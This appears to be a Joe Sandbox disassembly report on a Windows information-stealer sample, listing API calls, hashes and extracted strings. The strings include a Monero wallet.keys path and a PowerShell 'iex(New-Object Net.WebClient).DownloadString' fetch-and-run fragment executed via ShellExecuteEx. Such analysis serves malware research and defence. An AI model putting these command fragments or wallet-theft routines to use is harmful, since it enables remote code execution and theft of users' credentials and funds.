                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: c432a7eab93abed8d1666c7b402a8ec6d69f01afa5c220af8bbd745053c562e3
                  • Instruction ID: aaede35a75278eebe7075b9522591f54d9d42e2cb2004a2261fb084b5f506c33
                  • Opcode Fuzzy Hash: c432a7eab93abed8d1666c7b402a8ec6d69f01afa5c220af8bbd745053c562e3
                  • Instruction Fuzzy Hash: 580144B5A40308BFDB00EBE4DC49FAEB7B8EB54700F104154FA05E7291DA7455418B51
                  APIs
                  • memset.MSVCRT ref: 008840D5
                  • RegOpenKeyExA.ADVAPI32(80000001,015DD298,00000000,00020119,?), ref: 008840F4
                  • RegQueryValueExA.ADVAPI32(?,015DDD70,00000000,00000000,00000000,000000FF), ref: 00884118
                  • RegCloseKey.ADVAPI32(?), ref: 00884122
                  • lstrcat.KERNEL32(?,00000000), ref: 00884147
                  • lstrcat.KERNEL32(?,015DDBC0), ref: 0088415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: d61f1c9fbd0ec14e8c515592afe199ee917069ad8bdb3788fc090ac130e677bd
                  • Instruction ID: bd714630d5b8d71ae41040828945c0c77b262d2c4e7c165397e5a54b9d3fd5e9
                  • Opcode Fuzzy Hash: d61f1c9fbd0ec14e8c515592afe199ee917069ad8bdb3788fc090ac130e677bd
                  • Instruction Fuzzy Hash: 54419AB69001086BDB14FBE4DC46FFD733DF758300F408658B61996192EA759B898B93
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                  • LocalFree.KERNEL32(0087148F), ref: 00879A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: af2af28c208d4fff65c3d7ddd3acd3aea4f84a6e0dfe8ec96c5637a6ce18ab74
                  • Instruction ID: 1f35943300f8912ff33954eb37cb5be1b6229dd148b69352aaf05321c71e74d9
                  • Opcode Fuzzy Hash: af2af28c208d4fff65c3d7ddd3acd3aea4f84a6e0dfe8ec96c5637a6ce18ab74
                  • Instruction Fuzzy Hash: 8D312BB4A00209EFDB14CFA4C885BAEB7B5FF58350F108158E905E7294D778E941CFA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: b63eedaf813d80a768a8319c740c47cef6a382bdb8619850c4d07a262735852b
                  • Instruction ID: 4c955b1bedb52ca50e6a688c8ebb6e633503dac79b00a07546c809d00401953f
                  • Opcode Fuzzy Hash: b63eedaf813d80a768a8319c740c47cef6a382bdb8619850c4d07a262735852b
                  • Instruction Fuzzy Hash: F241F6B110079C5EDB25AB288D84FFB7FE8FB45708F1444E8E98AC6186E2719A458F70
                  APIs
                  • lstrcat.KERNEL32(?,015DDC80), ref: 008847DB
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00884801
                  • lstrcat.KERNEL32(?,?), ref: 00884820
                  • lstrcat.KERNEL32(?,?), ref: 00884834
                  • lstrcat.KERNEL32(?,015CAFC8), ref: 00884847
                  • lstrcat.KERNEL32(?,?), ref: 0088485B
                  • lstrcat.KERNEL32(?,015DD1B8), ref: 0088486F
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 00888D90: GetFileAttributesA.KERNEL32(00000000,?,00871B54,?,?,0089564C,?,?,00890E1F), ref: 00888D9F
                    • Part of subcall function 00884570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00884580
                    • Part of subcall function 00884570: RtlAllocateHeap.NTDLL(00000000), ref: 00884587
                    • Part of subcall function 00884570: wsprintfA.USER32 ref: 008845A6
                    • Part of subcall function 00884570: FindFirstFileA.KERNEL32(?,?), ref: 008845BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 8271e6c280a0e7854048c889ff642869b81cb45ad304d352bb91097179193250
                  • Instruction ID: 76039ea180290ac0a45a125a292bf004549d48c31cfd8d72772b004e388ecd94
                  • Opcode Fuzzy Hash: 8271e6c280a0e7854048c889ff642869b81cb45ad304d352bb91097179193250
                  • Instruction Fuzzy Hash: 2C317FB2900208A7CB14FBF4DC85EE9777CFB58700F404589B31996092EE749B898B92
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00882D85
                  Strings
                  • <, xrefs: 00882D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00882CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00882D04
                  • ')", xrefs: 00882CB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 0b2afd006df1a6f6d0c5542f986fd748d9f12e43f8d1932f639c69bde0d8e627
                  • Instruction ID: b38d19eb2449044e2568ff906e409a1a01f2b72cd8eb47ae492ed0fd0d31f0ba
                  • Opcode Fuzzy Hash: 0b2afd006df1a6f6d0c5542f986fd748d9f12e43f8d1932f639c69bde0d8e627
                  • Instruction Fuzzy Hash: A241AC718102189AEB18FBA4CC91BDDBB74FF14700F40416AE116E61D2DF786A4ACFA2
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00879F41
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 469b5f20286e5e59577f9739c145b581c5f97117bdb21049592279523e14d130
                  • Instruction ID: dab9142ccdd1aee1615285dec22cb8d57d5079e3877578750dd1753e06804726
                  • Opcode Fuzzy Hash: 469b5f20286e5e59577f9739c145b581c5f97117bdb21049592279523e14d130
                  • Instruction Fuzzy Hash: 22612C71900248DBDF18EFA8CC96BED7775FF54304F008518F90A9B695EB74AA05CB92
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0088696C
                  • sscanf.NTDLL ref: 00886999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008869B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008869C0
                  • ExitProcess.KERNEL32 ref: 008869DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 40f052a415a1f2ccc53a22da4cd826610aca83735ea9425512fa97335cc4034a
                  • Instruction ID: a90ee7860f08452e8a4e54e23da890263b87d6f33cdaa6c91b5cb94f8e931a02
                  • Opcode Fuzzy Hash: 40f052a415a1f2ccc53a22da4cd826610aca83735ea9425512fa97335cc4034a
                  • Instruction Fuzzy Hash: A021DC75D14208ABCF08EFE8D9459EEB7B5FF58300F04856EE406E3251EB345615CBA5
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,015CBCE8,00000000,00020119,?), ref: 00887E5E
                  • RegQueryValueExA.ADVAPI32(?,015DD398,00000000,00000000,000000FF,000000FF), ref: 00887E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00887E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 802ad2ff5ca2a09ffdb3aa952c16924b6d83c7d81f6635766b75d34b10a0b69f
                  • Instruction ID: ba64d9d7ffdbcfc07e0a5585df50893307d23fad622cc179f5c41bea4601a687
                  • Opcode Fuzzy Hash: 802ad2ff5ca2a09ffdb3aa952c16924b6d83c7d81f6635766b75d34b10a0b69f
                  • Instruction Fuzzy Hash: E8118CB2A44209EBD710DFD4DC49FBBBBB8FB04B10F204259F605E7291D77458018BA1
                  APIs
                  • StrStrA.SHLWAPI(015DDAA0,?,?,?,0088140C,?,015DDAA0,00000000), ref: 0088926C
                  • lstrcpyn.KERNEL32(00ABAB88,015DDAA0,015DDAA0,?,0088140C,?,015DDAA0), ref: 00889290
                  • lstrlen.KERNEL32(?,?,0088140C,?,015DDAA0), ref: 008892A7
                  • wsprintfA.USER32 ref: 008892C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: f7a958e709a273b8eb8d9ccbafd7529b6121c4fa65df8eab07aec23776816cb8
                  • Instruction ID: 1bf1f2b5707d121c71444e8a099a66b9f91e8ad2bb416d532833d15c6c44f9a1
                  • Opcode Fuzzy Hash: f7a958e709a273b8eb8d9ccbafd7529b6121c4fa65df8eab07aec23776816cb8
                  • Instruction Fuzzy Hash: 76011A75600108FFCB04DFECC998EAE7BB9FB58354F148648F9199B216CA31AE41DB91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008712B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 008712BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008712D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008712F5
                  • RegCloseKey.ADVAPI32(?), ref: 008712FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: e9a779b8818c34731184ae0906908bc695d19e4c5dcb2b65eb3d1e08afc15e1d
                  • Instruction ID: 65482d72b8fde94626695ab77c30450dd2d6456a1f04d41f7aba613daa01766e
                  • Opcode Fuzzy Hash: e9a779b8818c34731184ae0906908bc695d19e4c5dcb2b65eb3d1e08afc15e1d
                  • Instruction Fuzzy Hash: 310131B9A40208BFDB00DFE4DC49FAEB7BCEB58701F008259FA05D7291DA719A418F51
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00886663
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00886726
                  • ExitProcess.KERNEL32 ref: 00886755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 86deb82c0465a29b2ce44f6425063ada73aaee4276784ba8aa87bd1358605141
                  • Instruction ID: 0e6e5b0a0fefb45455e3374831d9cd3b0b8ef59d100c779e0ea7196cd8bb2050
                  • Opcode Fuzzy Hash: 86deb82c0465a29b2ce44f6425063ada73aaee4276784ba8aa87bd1358605141
                  • Instruction Fuzzy Hash: 23312DB1801218AADB18FB94DC91BDD7B78FF14300F804199F205A61A2DF746B49CF67
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00890E28,00000000,?), ref: 0088882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00888836
                  • wsprintfA.USER32 ref: 00888850
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 326f07caba91dba5b27053a9a754486bd771981d32952cbb2676806ae5686946
                  • Instruction ID: 9c9f7ae8be046c78a812e0c02887c2a63c8a461928e8b4bbec7fd40de5e28c3a
                  • Opcode Fuzzy Hash: 326f07caba91dba5b27053a9a754486bd771981d32952cbb2676806ae5686946
                  • Instruction Fuzzy Hash: 182100B1A44208AFDB04DFD4DD45FAEBBB8FB48711F104219F605E7691C77999018BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0088951E,00000000), ref: 00888D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00888D62
                  • wsprintfW.USER32 ref: 00888D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 16b6fa579726a0678a496e5d79fe85a1b1584f75ae049875b00aa6f558590754
                  • Instruction ID: c920088fc10b06cf8faf27581b1c62a06b889d632b1026b522fb42d33e531ab8
                  • Opcode Fuzzy Hash: 16b6fa579726a0678a496e5d79fe85a1b1584f75ae049875b00aa6f558590754
                  • Instruction Fuzzy Hash: 05E08CB1A44208BFCB00DFD4DC0EE6977BCEB04702F000294FD09D7691EA719E018B92
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0087A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0087A6BC
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0087A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: a5f7e7f1c10307dba3029d786fec0d80f56068e437e2094bf6ed986a7078c9ec
                  • Instruction ID: 698506ba26990dfa09f65bba317e54f822f209c16f6889bca3138c1827486fe5
                  • Opcode Fuzzy Hash: a5f7e7f1c10307dba3029d786fec0d80f56068e437e2094bf6ed986a7078c9ec
                  • Instruction Fuzzy Hash: 14E18D728101189AEB09FBA8DD95DEE7338FF54300F50816AF516B60D1EE386A49CB73
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087D481
                  • lstrlen.KERNEL32(00000000), ref: 0087D698
                  • lstrlen.KERNEL32(00000000), ref: 0087D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0087D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 408fff2a0d7f1e433959f2d25e1fd16f0d526c46640948833fd74f337c0a570a
                  • Instruction ID: 328387693ef40873cc011b06a2598a9be02ff6b8bb65555da88c6e44a0a33738
                  • Opcode Fuzzy Hash: 408fff2a0d7f1e433959f2d25e1fd16f0d526c46640948833fd74f337c0a570a
                  • Instruction Fuzzy Hash: B391AE729101149AEB08FBA8DD969EE7738FF54300F50416AF516E60D2EF386A49CB63
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
